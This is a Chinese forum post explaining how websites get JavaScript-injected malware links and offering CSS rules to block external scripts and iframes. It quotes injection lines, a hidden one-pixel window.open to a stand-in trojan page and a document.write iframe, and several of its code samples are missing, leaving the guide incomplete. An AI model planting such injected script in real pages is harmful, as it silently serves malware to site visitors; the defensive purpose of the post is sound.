×

扫描二维码登录本站

QQ登录

只需一步,快速开始

防止网站被JS挂马

标签: 暂无标签
现在最多见的JS挂马方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。
  这种方法使用的关键代码如下:
  window.open("http://www.A.com/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
  这种代码往往很长,很容易被安全工程师发现,而且没有经验的黑客也喜欢将“width”和“height=”参数设为“0”,但是设置为0后,可能会出现恶意代码不运行的情况。
  另外一种JS挂马方式是,黑客先将挂马脚本代码“document.write('<Iframe src="网页木马地址" >
  或者
  document.write("")
  document.write("")
  document.write("")
  就成功地将木马挂到了对方的网页中了。
  小提示:黑客还可以根据情况随机变换插入的JS挂马方法,例如黑客有可能会将脚本写为:
  
  或者:
  
  等等……
  防第一种JS挂马方式,不方便,用得非常少,而第二种JS挂马方式才是当前主流的,所以我们主要针对它进行防御。方法就是阻止Src请求的异地外域的JS脚本,代码如下:
  iframe{mdy1:expression(this.src='about:blank',this.outerHTML='');}
  script{mzm2:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}
  不过这种方法的缺点就是网站的访问者将不能看到被挂了JS木马的相关网页。
  所以我们为安全工程师提供了一段可以中止JS脚本运行的CSS代码,这段代码会让异地外域的JS文件在使用document.write()时,被document.close()强制关闭。这个时侯JS挂马的内容往往还没有来得及写完,只有部分被强制输出了,Writer后面的内容再不会被写入访问者的电脑中,从而起到防范JS脚本挂马的作用。
  让JS木马的进程迅速中止
  在   之间加入如下代码:
  屏蔽script和iframe
  
  /**/
  
  单屏蔽script
  
  /**/
  




上一篇:计算机网络IP地址攻击方式详解
下一篇:如何利用路由器防止DoS拒绝服务疯狂攻击
banana

写了 303 篇文章,拥有财富 1634,被 4 人关注

您需要登录后才可以回帖 登录 | 立即注册
B Color Link Quote Code Smilies
太阳 发表于 2011-7-18 16:27:00
强啊
東東 发表于 2020-11-25 16:46:23
超赞的资料,学习中
東東 发表于 2020-11-25 16:53:46
超赞的资料,学习中
手机版|小黑屋|最新100贴|论坛版块|ITIL先锋论坛,长河ITIL流程落地实战沙盘训练营! |粤ICP备11099876号|网站地图
Powered by Discuz! X3.4 Licensed  © 2001-2017 Comsenz Inc.
返回顶部